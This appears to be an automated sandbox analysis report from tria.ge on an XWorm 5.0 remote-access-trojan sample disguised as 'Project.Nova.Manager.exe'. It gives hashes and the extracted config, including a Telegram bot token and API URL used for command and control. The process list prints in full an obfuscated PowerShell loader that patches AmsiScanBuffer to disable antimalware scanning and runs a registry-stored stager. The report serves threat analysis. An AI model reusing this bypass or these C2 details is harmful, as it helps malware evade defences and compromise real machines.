Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
0s -
platform
windows11-21h2_x64 -
resource
win11-20231222-en -
resource tags
arch:x64arch:x86image:win11-20231222-enlocale:en-usos:windows11-21h2-x64system -
submitted
28/01/2024, 22:19
General
-
Target
Project.Nova.Manager.exe
-
Size
257KB
-
MD5
26eb1cb8c1151f6f6c9896bc1e866d55
-
SHA1
3aa45f36911679e61e0eab7742c07868da6347ad
-
SHA256
c7432706814d6536d4d4ced016274883a81d79fd18a85d7af1d54f690d4fe4bc
-
SHA512
95f0d1b79d3455b55912a3e4ef87dada9473f13546b967f112eb4c8ac7f34c5cc5089f6f6b2ebe2c7f35dee42b40033b2872f087e48901202d5f6e0db6cc0473
-
SSDEEP
6144:iSncRl9e39cQpsO4jajCIvpe/ZNQZuhfLguQ00KHTl:P4TJjJIkhCP27H
Malware Config
Extracted
xworm
5.0
O0ZX0px0G0o1uOFK
-
Install_directory
%ProgramData%
-
install_file
$77svchost.exe
-
telegram
https://api.telegram.org/bot6094198209:AAGtbuJi6hBqVBpkxn3UzVsVOtCJjMn1cjE
Signatures
-
Detect Xworm Payload 3 IoCs
resource yara_rule behavioral1/files/0x000900000002a724-4.dat family_xworm behavioral1/files/0x000900000002a724-11.dat family_xworm behavioral1/memory/3512-19-0x0000000000A90000-0x0000000000AA0000-memory.dmp family_xworm
Processes
-
C:\Users\Admin\AppData\Local\Temp\Project.Nova.Manager.exe"C:\Users\Admin\AppData\Local\Temp\Project.Nova.Manager.exe"1⤵PID:1768
-
C:\Users\Admin\AppData\Local\Temp\INSTALL.EXE"C:\Users\Admin\AppData\Local\Temp\INSTALL.EXE"2⤵PID:3708
-
-
C:\Users\Admin\AppData\Local\Temp\$77SVCHOST.EXE"C:\Users\Admin\AppData\Local\Temp\$77SVCHOST.EXE"2⤵PID:3512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:SBarsFtjfKMx{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$qQXKMqNkrKEUtJ,[Parameter(Position=1)][Type]$hmusnYsVML)$PMqIELVMIGM=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'fl'+'e'+''+[Char](99)+''+[Char](116)+'e'+'d'+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+'e'+[Char](109)+'or'+'y'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType('M'+'y'+'D'+[Char](101)+''+'l'+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+[Char](84)+'y'+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+'P'+'ub'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'l'+'e'+'d,'+'A'+'n'+'s'+'i'+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+'s,'+'A'+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+''+'l'+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$PMqIELVMIGM.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+'N'+'a'+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+'g'+','+[Char](80)+''+'u'+''+[Char](98)+'l'+'i'+'c',[Reflection.CallingConventions]::Standard,$qQXKMqNkrKEUtJ).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+'nage'+[Char](100)+'');$PMqIELVMIGM.DefineMethod('I'+'n'+''+'v'+'o'+[Char](107)+''+'e'+'',''+[Char](80)+''+'u'+'bl'+'i'+''+[Char](99)+','+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+'yS'+[Char](105)+'g'+[Char](44)+''+'N'+''+'e'+''+'w'+''+[Char](83)+'lo'+'t'+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+'a'+[Char](108)+'',$hmusnYsVML,$qQXKMqNkrKEUtJ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+'m'+'e'+','+'M'+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $PMqIELVMIGM.CreateType();}$nzFzaPusSWSUS=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+'m'+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+'W'+'in32'+'.'+'U'+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+'N'+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+'tho'+[Char](100)+''+'s'+'');$OouHARyjxPiUuH=$nzFzaPusSWSUS.GetMethod('G'+[Char](101)+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+'c'+[Char](65)+'ddr'+'e'+'ss',[Reflection.BindingFlags]('Pu'+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+'S'+'t'+''+[Char](97)+''+'t'+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ehyxguWNiuqqyJwqzMb=SBarsFtjfKMx @([String])([IntPtr]);$SPLFhUMAswpXVZNSbyBBJl=SBarsFtjfKMx @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$FvhiQvVvOap=$nzFzaPusSWSUS.GetMethod('G'+'e'+''+'t'+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+''+[Char](72)+'a'+'n'+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('ke'+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$FXPNyIDeHuUFIO=$OouHARyjxPiUuH.Invoke($Null,@([Object]$FvhiQvVvOap,[Object](''+'L'+'o'+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+'ra'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$iAJnNlkgSItwPfQmH=$OouHARyjxPiUuH.Invoke($Null,@([Object]$FvhiQvVvOap,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+'u'+'a'+''+[Char](108)+''+[Char](80)+''+'r'+'o'+[Char](116)+''+'e'+''+'c'+''+'t'+'')));$cNHYZis=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FXPNyIDeHuUFIO,$ehyxguWNiuqqyJwqzMb).Invoke('a'+[Char](109)+''+[Char](115)+'i'+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$zkmThCzsssMFxXGYE=$OouHARyjxPiUuH.Invoke($Null,@([Object]$cNHYZis,[Object](''+'A'+'m'+[Char](115)+'i'+[Char](83)+''+'c'+''+[Char](97)+''+[Char](110)+''+[Char](66)+'u'+'f'+''+[Char](102)+''+'e'+''+[Char](114)+'')));$xpSCfIMKfE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($iAJnNlkgSItwPfQmH,$SPLFhUMAswpXVZNSbyBBJl).Invoke($zkmThCzsssMFxXGYE,[uint32]8,4,[ref]$xpSCfIMKfE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$zkmThCzsssMFxXGYE,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($iAJnNlkgSItwPfQmH,$SPLFhUMAswpXVZNSbyBBJl).Invoke($zkmThCzsssMFxXGYE,[uint32]8,0x20,[ref]$xpSCfIMKfE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'OF'+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+'7'+'7'+''+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"1⤵PID:3096
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{53b4b5f4-fddd-4ba6-925d-25aa80b1bc9a}1⤵PID:3592
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:928
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
20KB
MD552746bc7906dc5e25eef860474c48744
SHA1466b1c138fe71488f1175ae6fda7f09960ec4857
SHA256a4dbe789923dc8a8d274c8323ffef831c631a768f95cb7b787c38e074a615ce6
SHA512c90649e7727207e68654866e3180acc1210d724cbacb46e9a93a0a3c07d5bbbd5fb895d04b4d8e41707c50a0c4dcf6083a7e1fb6b8b32fef48c520fc85a2956c
-
Filesize
37KB
MD50a9651832b02e1a52ae0d50cfdc957fe
SHA13b571a344795847880c6d435d0ca7b8b404bf68e
SHA25675999b72d08bee4d4e797fee92270cc41d438256239129a9a6f76bd470f999c5
SHA51231600c4b235cd24d5d07596c3fcecdbb6fc2d9e8b7026220fd2542d085ca81dad48f58b2527eaa72d08bb63f9bf162c21d7419a48776c6d759c54eb38e0ead77
-
Filesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82